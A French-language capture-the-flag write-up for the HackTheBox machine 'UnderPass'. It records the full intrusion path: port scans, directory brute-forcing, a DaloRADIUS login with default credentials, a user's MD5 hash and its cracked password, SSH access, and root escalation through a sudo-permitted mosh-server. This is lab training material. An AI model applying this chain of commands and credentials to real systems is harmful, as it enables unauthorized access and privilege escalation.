UnderPass HackTheBox (Writeup)

Skills:

UDP Enumeration
Default Credentials [DaloRADIUS]
Password Cracking
Privilege Escalation via SUDO (mosh-server)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

TCP

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.48 -oG allPorts

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.11.48 -oN targeted

UDP

Scan des ports UDP les plus utilisés:

Nous effectuons un scan des 100 ports UDP les plus courants :

nmap -sU --top-ports 100 --open -vvv -n 10.10.11.48 -oG allPortsUDP

Ports identifiés : 161, 1812, 1813.

Scan de version des services UDP : Nous ciblons les ports identifiés pour obtenir des informations supplémentaires :

nmap -sUCV -p161,1812,1813 10.10.11.48 -oN targetedUDP

Observation initiale :

Le domaine underpass.htb est découvert.
Un CMS nommé DaloRADIUS est identifié.

CMS - DaloRADIUS

Scan des répertoires avec Gobuster : Nous explorons les répertoires du site web :

gobuster dir -u http://underpass.htb/daloradius/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Résultat : un répertoire nommé /app est découvert.

Énumération des sous-répertoires :

En explorant /app, nous trouvons :

gobuster dir -u http://underpass.htb/daloradius/app/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Une page de login pour les utilisateurs.

Une page de login pour les opérateurs.

Accès avec les identifiants par défaut de DaloRADIUS : En testant les identifiants par défaut pour RADIUS :

Nom d'utilisateur : administrator
Mot de passe : radius Ces identifiants fonctionnent sur le panel des opérateurs.

Extraction d'informations sensibles:

Dans la section Management, nous trouvons un nom d'utilisateur et un hash de mot de passe :

Utilisateur : svcMosh
Hash : 412DD4759978ACFCC81DEAB01B382403

Crackage du mot de passe :

Nous utilisons CrackStation pour décrypter le hash :

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

Mot de passe décrypté : underwaterfriends

Connexion SSH : Avec ces identifiants, nous accédons à la machine via SSH :

ssh [email protected]

underwaterfriends

Élévation de privilèges

SUDO - Mosh-Server

En vérifiant les permissions avec la commande sudo -l, nous découvrons que l'utilisateur svcMosh peut exécuter le binaire mosh-server avec des privilèges administrateurs sans fournir de mot de passe

sudo -l

Puisque vous avez la possibilité d'exécuter mosh-server en tant que root, vous pouvez exploiter cela pour établir une connexion avec mosh en utilisant sudo pour exécuter le serveur en tant qu'administrateur.

La commande suivante va permettre d'exécuter mosh-server avec des privilèges root, puis d'établir une connexion avec le client mosh :

mosh --server="sudo /usr/bin/mosh-server" localhost

Cela va permettre à mosh de se connecter au serveur mosh-server qui est exécuté en tant que root sur localhost. En utilisant cette méthode, vous aurez un accès privilégié à la machine avec des droits d'administrateur.

Flag root.txt :)

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?